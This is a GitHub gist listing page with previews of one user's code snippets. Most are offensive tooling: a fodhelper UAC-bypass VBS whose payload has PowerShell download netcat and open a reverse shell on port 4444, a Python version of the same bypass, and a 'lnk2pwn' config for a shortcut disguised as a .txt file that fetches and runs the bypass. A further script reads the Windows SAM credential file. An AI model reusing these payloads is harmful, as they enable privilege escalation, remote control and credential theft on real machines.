Skip to content

Instantly share code, notes, and snippets.

Tom Melo tommelo

Block or report user

Report or block tommelo

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@tommelo
tommelo / garageweek.py
Created Jul 21, 2018
Hackaflag Garage Week (Bradesco) | Resolução da challenge da Pirâmide
View garageweek.py
#!/usr/bin/env python
# -*- coding: utf-8; mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vim: fileencoding=utf-8 tabstop=4 expandtab shiftwidth=4
# pylint: disable=C0103,C0301,W1202,W0212
"""
Hackaflag Garage Week (Bradesco)
Resolução do desafio da pirâmide:
HOST: 159.65.181.58
View uac_bypass.vbs
Const HKEY_CURRENT_USER = &H80000001
Const FodHelperPath = "C:\\Windows\\System32\\fodhelper.exe"
Const RegKeyPathStr = "SOFTWARE\\Classes\\ms-settings\\shell\\open\\command"
Const RegKeyPath = "Software\\Classes\\ms-settings\\shell\\open\\command"
Const DelegateExecRegKeyName = "DelegateExecute"
Const DelegateExecRegKeyValue = ""
Const DefaultRegKeyName = ""
Const DefaultRegKeyValue = "cmd.exe /c powershell.exe -nop -w hidden iwr -outf C:\Windows\System32\nc.exe http://127.0.0.1/nc.exe & C:\Windows\System32\nc.exe 127.0.0.1 4444 -e cmd.exe"
@tommelo
tommelo / config.json
Created Apr 25, 2018
lnk2pwn shortcut config
View config.json
{
"shortcut": {
"target_path": "C:\\Windows\\System32\\cmd.exe",
"working_dir": "C:\\Windows\\System32",
"arguments": "/c powershell.exe iwr -outf %tmp%\\p.vbs http://127.0.0.1/uac_bypass.vbs & %tmp%\\p.vbs",
"icon_path": "C:\\Windows\\System32\\notepad.exe",
"icon_index": null,
"window_style": "MINIMIZED",
"description": "TRUST ME",
"fake_extension": ".txt",
@tommelo
tommelo / evil.js
Last active Feb 10, 2018
evil hacker 101
View evil.js
console.log("ok");
View alphanumeric.py
class Alphanumeric(object):
ALPHABET_LENGTH = 26
def __init__(self, nrange=None):
self.current_letter = 'z'
self.current_number = 0
self.nrange = nrange
def forward_letter(self, letter, positions):
View uacbypass.py
import os
import sys
import ctypes
import _winreg
CMD = r"C:\Windows\System32\cmd.exe"
FOD_HELPER = r'C:\Windows\System32\fodhelper.exe'
PYTHON_CMD = "python"
REG_PATH = 'Software\Classes\ms-settings\shell\open\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'
View admin-check.py
import os
import sys
import ctypes
import _winreg
def is_running_as_admin():
'''
Checks if the script is running with administrative privileges.
Returns True if is running as admin, False otherwise.
'''
View sam-no-admin.py
SAM_FILE = r'C:\Windows\System32\config\sam'
with open(SAM_FILE, 'r') as sam:
print sam.readlines()
View observer.php
<?php
class Events {
private static $listeners = array();
public static function listen($event, $callback) {
self::$listeners[$event][] = $callback;
}
View resut.json
[
{
"link": "https://www.instagram.com/menshealthmag",
"username": "menshealthmag",
"name": "Men's Health",
"followers": "939k",
"picture": "https://instagram.fcpq1-1.fna.fbcdn.net/t51.2885-19/11371057_983333891687510_70028928_a.jpg"
},
{
"link": "https://www.instagram.com/harpersbazaarus",
You can’t perform that action at this time.